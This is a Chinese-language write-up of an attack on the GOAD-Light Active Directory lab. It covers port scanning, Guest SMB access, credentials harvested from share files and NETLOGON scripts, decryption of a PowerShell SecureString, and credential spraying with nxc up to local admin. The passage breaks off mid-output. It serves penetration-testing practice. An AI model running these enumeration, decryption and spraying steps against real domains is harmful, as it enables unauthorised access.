GOAD-Light

这是不包含 essos 域的轻量级 goad 版本。此实验环境专为性能较低的计算机（最小内存约 20GB）构建。

下载地址：https://github.com/Orange-Cyberdefense/GOAD 

https://orange-cyberdefense.github.io/GOAD/labs/GOAD-Light

相对于完整的GOAD缺失了

•  跨 Forest 攻击场景
•  MSSQL 的 linked server / trusted link 横向场景
•  一些依赖旧系统 / 旧补丁状态的漏洞场景
• AD CS 证书服务攻击场景

域名：sevenkingdoms.local

• kingslanding：DC01 运行在 Windows Server 2019 上（默认启用 Windows Defender）

域名：north.sevenkingdoms.local

• winterfell ：DC02 运行在 Windows Server 2019 上（默认启用 Windows Defender）
• castelblack：SRV02 运行在 Windows Server 2019 上（默认情况下已禁用 Windows Defender）

环境准备

在此之前先给kali桥接一个VirtualBox的网卡

把域名添加到hosts里，方便后面复现

sudo tee -a /etc/hosts <<'EOF'
192.168.56.10 kingslanding.sevenkingdoms.local sevenkingdoms.local kingslanding
192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.22 castelblack.north.sevenkingdoms.local castelblack
EOF

网络发现与信息搜集

首先，我们已知网络范围是 192.168.56.0/24，那么先用 nmap 扫描存活主机和端口。

nmap -sP 192.168.56.0/24

• MAC Address: 08:00:27:16:F2:7B (Oracle VirtualBox virtual NIC)
• Nmap scan report for kingslanding.sevenkingdoms.local (192.168.56.10)
• Host is up (0.00016s latency).
• MAC Address: 08:00:27:0A:A8:40 (Oracle VirtualBox virtual NIC)
• Nmap scan report for winterfell.north.sevenkingdoms.local (192.168.56.11)
• Host is up (0.00017s latency).
• MAC Address: 08:00:27:AD:F6:8F (Oracle VirtualBox virtual NIC)
• Nmap scan report for castelblack.north.sevenkingdoms.local (192.168.56.22)
• Host is up (0.00023s latency).
• kingslanding.sevenkingdoms.local：192.168.56.10
• winterfell.north.sevenkingdoms.local ：192.168.56.11
• castelblack.north.sevenkingdoms.local：192.168.56.22

重点就是这三个ip，扫描端口，看看有什么服务

nmap -sS -sV -sC -p- -T4 -Pn 192.168.56.10 192.168.56.11 192.168.56.22

• ┌──(root㉿kali)-[~]
• └─# nmap -sS -sV -sC -p- -T4 -Pn 192.168.56.10 192.168.56.11 192.168.56.22
• Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-31 14:57 +0800
• Nmap scan report for kingslanding.sevenkingdoms.local (192.168.56.10)
• Host is up (0.00020s latency).
• Not shown: 65506 closed tcp ports (reset)
• PORT STATE SERVICE VERSION
• 53/tcp open domain Simple DNS Plus
• 80/tcp open http Microsoft IIS httpd 10.0
• |_http-title: IIS Windows Server
• |_http-server-header: Microsoft-IIS/10.0
• | http-methods:
• |_ Potentially risky methods: TRACE
• 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-31 06:57:06Z)
• 135/tcp open msrpc Microsoft Windows RPC
• 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
• 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
• | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
• | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
• | Not valid before: 2026-05-31T02:50:06
• |_Not valid after: 2027-05-31T02:50:06
• |_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
• 445/tcp open microsoft-ds?
• 464/tcp open kpasswd5?
• 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
• 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
• |_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
• | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
• | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
• | Not valid before: 2026-05-31T02:50:06
• |_Not valid after: 2027-05-31T02:50:06
• 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
• |_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
• | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
• | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
• | Not valid before: 2026-05-31T02:50:06
• |_Not valid after: 2027-05-31T02:50:06
• 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
• | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
• | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local
• | Not valid before: 2026-05-31T02:50:06
• |_Not valid after: 2027-05-31T02:50:06
• |_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
• 3389/tcp open ms-wbt-server Microsoft Terminal Services
• | rdp-ntlm-info:
• | Target_Name: SEVENKINGDOMS
• | NetBIOS_Domain_Name: SEVENKINGDOMS
• | NetBIOS_Computer_Name: KINGSLANDING
• | DNS_Domain_Name: sevenkingdoms.local
• | DNS_Computer_Name: kingslanding.sevenkingdoms.local
• | DNS_Tree_Name: sevenkingdoms.local
• | Product_Version: 10.0.17763
• |_ System_Time: 2026-05-31T06:59:26+00:00
• | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
• | Not valid before: 2026-05-30T02:31:32
• |_Not valid after: 2026-11-29T02:31:32
• |_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
• 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
• |_http-server-header: Microsoft-HTTPAPI/2.0
• |_http-title: Not Found
• 5986/tcp open ssl/wsmans?
• | ssl-cert: Subject: commonName=VAGRANT
• | Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
• | Not valid before: 2026-05-29T19:16:32
• |_Not valid after: 2029-05-28T19:16:32
• |_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.
• | tls-alpn:
• | h2
• |_ http/1.1
• 9389/tcp open mc-nmf .NET Message Framing
• 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
• |_http-server-header: Microsoft-HTTPAPI/2.0
• |_http-title: Not Found
• 49664/tcp open msrpc Microsoft Windows RPC
• 49665/tcp open msrpc Microsoft Windows RPC
• 49666/tcp open msrpc Microsoft Windows RPC
• 49668/tcp open msrpc Microsoft Windows RPC
• 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
• 49674/tcp open msrpc Microsoft Windows RPC
• 49676/tcp open msrpc Microsoft Windows RPC
• 49679/tcp open msrpc Microsoft Windows RPC
• 49689/tcp open msrpc Microsoft Windows RPC
• 49780/tcp open msrpc Microsoft Windows RPC
• 49862/tcp open msrpc Microsoft Windows RPC
• 49998/tcp open msrpc Microsoft Windows RPC
• MAC Address: 08:00:27:0A:A8:40 (Oracle VirtualBox virtual NIC)
• Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows
• Host script results:
• | smb2-time:
• | date: 2026-05-31T06:59:26
• |_ start_date: N/A
• |_clock-skew: mean: -14s, deviation: 0s, median: -14s
• | smb2-security-mode:
• | 3.1.1:
• |_ Message signing enabled and required
• |_nbstat: NetBIOS name: KINGSLANDING, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:0a:a8:40 (Oracle VirtualBox virtual NIC)
• Nmap scan report for winterfell.north.sevenkingdoms.local (192.168.56.11)
• Host is up (0.00017s latency).
• Not shown: 65508 closed tcp ports (reset)
• PORT STATE SERVICE VERSION
• 53/tcp open domain Simple DNS Plus
• 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-31 06:57:22Z)
• 135/tcp open msrpc Microsoft Windows RPC
• 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
• 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
• | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
• | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
• | Not valid before: 2026-05-31T03:40:45
• |_Not valid after: 2027-05-31T03:40:45
• |_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
• 445/tcp open microsoft-ds?
• 464/tcp open kpasswd5?
• 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
• 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
• | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
• | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
• | Not valid before: 2026-05-31T03:40:45
• |_Not valid after: 2027-05-31T03:40:45
• |_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
• 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
• | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
• | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
• | Not valid before: 2026-05-31T03:40:45
• |_Not valid after: 2027-05-31T03:40:45
• |_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
• 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)
• | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
• | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local
• | Not valid before: 2026-05-31T03:40:45
• |_Not valid after: 2027-05-31T03:40:45
• |_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
• 3389/tcp open ms-wbt-server Microsoft Terminal Services
• |_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
• | rdp-ntlm-info:
• | Target_Name: NORTH
• | NetBIOS_Domain_Name: NORTH
• | NetBIOS_Computer_Name: WINTERFELL
• | DNS_Domain_Name: north.sevenkingdoms.local
• | DNS_Computer_Name: winterfell.north.sevenkingdoms.local
• | DNS_Tree_Name: sevenkingdoms.local
• | Product_Version: 10.0.17763
• |_ System_Time: 2026-05-31T06:59:04+00:00
• | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
• | Not valid before: 2026-05-30T02:53:40
• |_Not valid after: 2026-11-29T02:53:40
• 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
• |_http-title: Not Found
• |_http-server-header: Microsoft-HTTPAPI/2.0
• 5986/tcp open ssl/wsmans?
• | ssl-cert: Subject: commonName=VAGRANT
• | Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
• | Not valid before: 2026-05-29T19:18:45
• |_Not valid after: 2029-05-28T19:18:45
• | tls-alpn:
• | h2
• |_ http/1.1
• |_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.
• 9389/tcp open mc-nmf .NET Message Framing
• 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
• |_http-server-header: Microsoft-HTTPAPI/2.0
• |_http-title: Not Found
• 49664/tcp open msrpc Microsoft Windows RPC
• 49665/tcp open msrpc Microsoft Windows RPC
• 49666/tcp open msrpc Microsoft Windows RPC
• 49668/tcp open msrpc Microsoft Windows RPC
• 49676/tcp open msrpc Microsoft Windows RPC
• 49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
• 49679/tcp open msrpc Microsoft Windows RPC
• 49682/tcp open msrpc Microsoft Windows RPC
• 49711/tcp open msrpc Microsoft Windows RPC
• 51116/tcp open msrpc Microsoft Windows RPC
• 57356/tcp open msrpc Microsoft Windows RPC
• MAC Address: 08:00:27:AD:F6:8F (Oracle VirtualBox virtual NIC)
• Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows
• Host script results:
• | smb2-time:
• | date: 2026-05-31T06:59:04
• |_ start_date: N/A
• | smb2-security-mode:
• | 3.1.1:
• |_ Message signing enabled and required
• |_nbstat: NetBIOS name: WINTERFELL, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ad:f6:8f (Oracle VirtualBox virtual NIC)
• |_clock-skew: mean: -33s, deviation: 0s, median: -33s
• Nmap scan report for castelblack.north.sevenkingdoms.local (192.168.56.22)
• Host is up (0.00031s latency).
• Not shown: 65516 closed tcp ports (reset)
• PORT STATE SERVICE VERSION
• 80/tcp open http Microsoft IIS httpd 10.0
• |_http-server-header: Microsoft-IIS/10.0
• | http-methods:
• |_ Potentially risky methods: TRACE
• |_http-title: Site doesn’t have a title (text/html).
• 135/tcp open msrpc Microsoft Windows RPC
• 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
• 445/tcp open microsoft-ds?
• 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
• | ms-sql-info:
• | 192.168.56.22:1433:
• | Version:
• | name: Microsoft SQL Server 2019 RTM
• | number: 15.00.2000.00
• | Product: Microsoft SQL Server 2019
• | Service pack level: RTM
• | Post-SP patches applied: false
• |_ TCP port: 1433
• | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
• | Not valid before: 2026-05-31T03:46:28
• |_Not valid after: 2056-05-31T03:46:28
• |_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.
• | ms-sql-ntlm-info:
• | 192.168.56.22:1433:
• | Target_Name: NORTH
• | NetBIOS_Domain_Name: NORTH
• | NetBIOS_Computer_Name: CASTELBLACK
• | DNS_Domain_Name: north.sevenkingdoms.local
• | DNS_Computer_Name: castelblack.north.sevenkingdoms.local
• | DNS_Tree_Name: sevenkingdoms.local
• |_ Product_Version: 10.0.17763
• 3389/tcp open ms-wbt-server Microsoft Terminal Services
• | ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local
• | Not valid before: 2026-05-30T03:06:25
• |_Not valid after: 2026-11-29T03:06:25
• | rdp-ntlm-info:
• | Target_Name: NORTH
• | NetBIOS_Domain_Name: NORTH
• | NetBIOS_Computer_Name: CASTELBLACK
• | DNS_Domain_Name: north.sevenkingdoms.local
• | DNS_Computer_Name: castelblack.north.sevenkingdoms.local
• | DNS_Tree_Name: sevenkingdoms.local
• | Product_Version: 10.0.17763
• |_ System_Time: 2026-05-31T06:59:36+00:00
• |_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.
• 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
• |_http-title: Not Found
• |_http-server-header: Microsoft-HTTPAPI/2.0
• 5986/tcp open ssl/wsmans?
• |_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.
• | tls-alpn:
• | h2
• |_ http/1.1
• | ssl-cert: Subject: commonName=VAGRANT
• | Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
• | Not valid before: 2026-05-29T19:20:59
• |_Not valid after: 2029-05-28T19:20:59
• 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
• |_http-server-header: Microsoft-HTTPAPI/2.0
• |_http-title: Not Found
• 49664/tcp open msrpc Microsoft Windows RPC
• 49665/tcp open msrpc Microsoft Windows RPC
• 49666/tcp open msrpc Microsoft Windows RPC
• 49667/tcp open msrpc Microsoft Windows RPC
• 49668/tcp open msrpc Microsoft Windows RPC
• 49669/tcp open msrpc Microsoft Windows RPC
• 49670/tcp open msrpc Microsoft Windows RPC
• 55452/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
• | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
• | Not valid before: 2026-05-31T03:46:28
• |_Not valid after: 2056-05-31T03:46:28
• | ms-sql-info:
• | 192.168.56.22:55452:
• | Version:
• | name: Microsoft SQL Server 2019 RTM
• | number: 15.00.2000.00
• | Product: Microsoft SQL Server 2019
• | Service pack level: RTM
• | Post-SP patches applied: false
• |_ TCP port: 55452
• |_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.
• | ms-sql-ntlm-info:
• | 192.168.56.22:55452:
• | Target_Name: NORTH
• | NetBIOS_Domain_Name: NORTH
• | NetBIOS_Computer_Name: CASTELBLACK
• | DNS_Domain_Name: north.sevenkingdoms.local
• | DNS_Computer_Name: castelblack.north.sevenkingdoms.local
• | DNS_Tree_Name: sevenkingdoms.local
• |_ Product_Version: 10.0.17763
• 57413/tcp open msrpc Microsoft Windows RPC
• 57437/tcp open msrpc Microsoft Windows RPC
• MAC Address: 08:00:27:A2:3A:39 (Oracle VirtualBox virtual NIC)
• Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
• Host script results:
• | smb2-time:
• | date: 2026-05-31T06:59:35
• |_ start_date: N/A
• | smb2-security-mode:
• | 3.1.1:
• |_ Message signing enabled but not required
• |_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:a2:3a:39 (Oracle VirtualBox virtual NIC)
• |_clock-skew: mean: -4s, deviation: 0s, median: -4s
• Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
• Nmap done: 3 IP addresses (3 hosts up) scanned in 138.62 seconds

关键端口与服务速览

太多了，挑几个重要的

拓扑确认

192.168.56.10 KINGSLANDING DC01 sevenkingdoms.local

192.168.56.11 WINTERFELL DC02 north.sevenkingdoms.local

192.168.56.22 CASTELBLACK SRV02 north.sevenkingdoms.local

或者nxc smb 192.168.56.0/24

更快地概括一下这三台主机的关键服务：

• DC01：
• 53 DNS80 IIS / ADCS Web Enrollment88 Kerberos389/636 LDAP/LDAPS3268/3269 Global Catalog445 SMB signing required3389 RDP5985/5986 WinRM
• DC02：
• 53 DNS88 Kerberos389/636 LDAP/LDAPS3268/3269 Global Catalog445 SMB signing required3389 RDP5985/5986 WinRM
• SRV02：
• 80 IIS445 SMB signing enabled but not required1433 MSSQL55452 MSSQL dynamic port3389 RDP5985/5986 WinRM

SRV02 的 SMB signing “enabled but not required” ，重点很高，后面做SMB枚举，Responder/LLMNR、NTLM relay 相关复现。

先把域名、DC、SMB 策略、匿名访问情况确认清楚

域信息枚举

dig @192.168.56.10 -t SRV _ldap._tcp.sevenkingdoms.local

返回：_ldap._tcp.sevenkingdoms.local. 600 IN SRV 0 100 389 kingslanding.sevenkingdoms.local.

LDAP端口是389，服务器是kingslanding.sevenkingdoms.local

dig @192.168.56.10 -t SRV _kerberos._tcp.sevenkingdoms.local

返回：_kerberos._tcp.sevenkingdoms.local. 600 IN SRV 0 100 88 kingslanding.sevenkingdoms.local.

Kerberos 端口是88，Kerberos 认证服务器是 kingslanding.sevenkingdoms.local

dig @192.168.56.11 -t SRV _ldap._tcp.north.sevenkingdoms.local

子域192.168.56.11中

_ldap._tcp.north.sevenkingdoms.local. 600 IN SRV 0 100 389 winterfell.north.sevenkingdoms.local.

north.sevenkingdoms.local的LDAP服务器是winterfell，端口是389

匿名访问与共享枚举

测用Guest能不能登录SMB

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 -u 'Guest' -p ''

SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)

SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)

SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)

SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\Guest: STATUS_ACCOUNT_DISABLED

SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\Guest:

SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\Guest: STATUS_ACCOUNT_DISABLED

Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Guest 空密码可以登录 CASTELBLACK

枚举Guest能访问哪些共享

nxc smb 192.168.56.22 -u 'Guest' -p '' --shares

SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)

SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\Guest:

SMB 192.168.56.22 445 CASTELBLACK [*] Enumerated shares

SMB 192.168.56.22 445 CASTELBLACK Share Permissions Remark

SMB 192.168.56.22 445 CASTELBLACK —– ———– ——

SMB 192.168.56.22 445 CASTELBLACK ADMIN$ Remote Admin

SMB 192.168.56.22 445 CASTELBLACK all READ,WRITE Basic RW share for all

SMB 192.168.56.22 445 CASTELBLACK C$ Default share

SMB 192.168.56.22 445 CASTELBLACK IPC$ READ Remote IPC

SMB 192.168.56.22 445 CASTELBLACK public Basic Read share for all domain users

Guest对’all’有读写的权限

进入all共享查看文件

smbclient //192.168.56.22/all -U 'Guest%' -c 'recurse; ls'

 . D 0 Sun May 31 17:04:31 2026

 .. D 0 Sun May 31 17:04:31 2026

 arya.txt A 413 Sun May 31 11:48:39 2026

 15638527 blocks of size 4096. 8043023 blocks available

all共享里有一个arya.txt文件

创建一个文件夹把文件下载下来

• mkdir -p castelblack-all
• smbclient //192.168.56.22/all -U ‘Guest%’ -c ‘lcd castelblack-all; get arya.txt’
• cat castelblack-all/arya.txt

Hey Arya,

I hope this message finds you well. Something urgent has come up, and I have to leave for a while. Don’t worry; I’ll be back soon.

I left a little surprise for you in your room – the sword You’ve named “Needle.” It felt fitting, given your skills. Take care of it, and it’ll take care of you.

I’ll explain everything when I return. Until then, stay sharp, sis.

Best,

John

共享与凭据突破

从 arya.txt 到初始凭据

这封信的大意是：John 给自己的妹妹留了一把名为 Needle 的剑。

这里最直接的线索是密码可能与 Needle 有关，但用户名还需要结合后续枚举来确认。

这里先留一个疑问：仅凭 arya.txt 只能较强地指向密码 Needle，但用户名 arya.stark 不是只靠这封信唯一推出的，而是结合 GOAD 公开资料与后续验证确认的。

参考：

https://cyb3rbyte.medium.com/goad-part-1-scanning-the-forest-reconnaissance-in-an-active-directory-jungle-53a125bd2486

https://cyb3rbyte.medium.com/goad-part-2-when-enumeration-bites-back-from-smb-to-r-i-p-ee7708c98b7d

https://cyb3rbyte.medium.com/goad-part-3-the-art-of-extraction-roasting-and-poisoning-for-domain-dominance-240aa6490dd1

文章里直接用 nxc smb live.hosts –users 就枚举到了 samwell.tarly 等用户信息；而我的环境拒绝匿名 SAMR 枚举，说明当前 GOAD-Light 版本的默认策略与文章环境存在差异。

用 arya.stark / Needle 这组凭据做登录验证。

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \
  -u 'arya.stark' -p 'Needle'

说明这个账号能登陆192.168.56.11，192.168.56.22

• nxc smb 192.168.56.11 192.168.56.22 \
•  -d north.sevenkingdoms.local \
•  -u ‘arya.stark’ -p ‘Needle’ –shares

用登陆过去凭证进行枚举

CASTELBLACK public READ,WRITE

CASTELBLACK all READ,WRITE

WINTERFELL NETLOGON READ

WINTERFELL SYSVOL READ

原来的public可以读写了，进一步读取public里的内容

• smbclient //192.168.56.22/public \
•  -U ‘north.sevenkingdoms.local/arya.stark%Needle’ \
•  -c ‘recurse; ls’

再看all

虽然public能访问，但是是空的，all里也没有新东西

读取 NETLOGON 与 SYSVOL

下载 NETLOGON 和 SYSVOL

smbclient //192.168.56.11/NETLOGON \
  -U 'north.sevenkingdoms.local/arya.stark%Needle' \
  -c 'recurse; ls'

smbclient //192.168.56.11/SYSVOL \
  -U 'north.sevenkingdoms.local/arya.stark%Needle' \
  -c 'recurse; ls'

• ┌──(root㉿kali)-[~]
• └─# smbclient //192.168.56.11/NETLOGON \
• > -U ‘north.sevenkingdoms.local/arya.stark%Needle’ \
• > -c ‘recurse; ls’

•  . D 0 Sun May 31 11:47:39 2026
•  .. D 0 Sun May 31 11:47:39 2026
•  script.ps1 A 165 Sun May 31 11:47:35 2026
•  secret.ps1 A 869 Sun May 31 11:47:38 2026
•  15638527 blocks of size 4096. 11399309 blocks available

• ┌──(root㉿kali)-[~]
• └─# smbclient //192.168.56.11/SYSVOL \
• > -U ‘north.sevenkingdoms.local/arya.stark%Needle’ \
• > -c ‘recurse; ls’

•  . D 0 Sun May 31 10:39:17 2026
•  .. D 0 Sun May 31 10:39:17 2026
•  north.sevenkingdoms.local Dr 0 Sun May 31 10:39:17 2026

NETLOGON 里有两个脚本

script.ps1

secret.ps1

下载下来

mkdir -p winterfell-netlogon

smbclient //192.168.56.11/NETLOGON \
  -U 'north.sevenkingdoms.local/arya.stark%Needle' \
  -c 'lcd winterfell-netlogon; get script.ps1; get secret.ps1'

cat winterfell-netlogon/script.ps1
cat winterfell-netlogon/secret.ps1

┌──(root㉿kali)-[~]

└─# cat winterfell-netlogon/script.ps1

# fake script in netlogon with creds

$task = ‘/c TODO’

$taskName = “fake task”

$user = “NORTH\jeor.mormont”

$password = “_L0ngCl@w_”

# passwords in sysvol still …

┌──(root㉿kali)-[~]

└─# cat winterfell-netlogon/secret.ps1

# cypher script

# $domain=”sevenkingdoms.local”

# $EncryptionKeyBytes = New-Object Byte[] 32

# [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)

# $EncryptionKeyBytes | Out-File “encryption.key”

# $EncryptionKeyData = Get-Content “encryption.key”

# Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath “secret.encrypted”

# secret stored :

$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91

$secret=”76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA=”

# T.L.

脚本泄露与 secret.ps1 解密

script.ps1暴露了账密

$user = “NORTH\jeor.mormont”

$password = “_L0ngCl@w_”

secret.ps1

secret.ps1 是另一个泄露。它不是明文，而是 PowerShell 的 SecureString 加密结果：

注释里已经说明它怎么来的：ConvertFrom-SecureString -Key 用的是一个自定义 AES key。现在 $secret 是密文，$keyData 是密钥，而且两个都放在同一个文件里，所以可以直接解密。

在powershell中：

$keyData = [byte[]](177,252,228,64,28,91,12,201,20,91,21,139,255,65,9,247,41,55,164,28,75,132,143,71,62,191,211,61,154,61,216,91)

$secret = "76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="

$secure = ConvertTo-SecureString -String $secret -Key $keyData
$ptr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)

try {
    [Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptr)
}
finally {
    [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptr)
}

输出：powerkingftw135

目测是个密码powerkingftw135，但是不知道是哪个账户的 末尾有个#T.L.可能是线索

利用 jeor.mormont 横向验证

用script.ps1凭证进行喷洒

SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)

SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)

SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)

SMB 192.168.56.10 445 KINGSLANDING [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_

SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_

SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_ (Pwn3d!)

(Pwn3d!)表示在192.168.56.22上是管理员权限

本地管理员后的凭据提取

nxc smb 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u ‘jeor.mormont’ -p ‘_L0ngCl@w_’ \
  –loggedon-users

查看当前登录的用户

SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)

SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_ (Pwn3d!)

SMB 192.168.56.22 445 CASTELBLACK NORTH\CASTELBLACK$ logon_server:

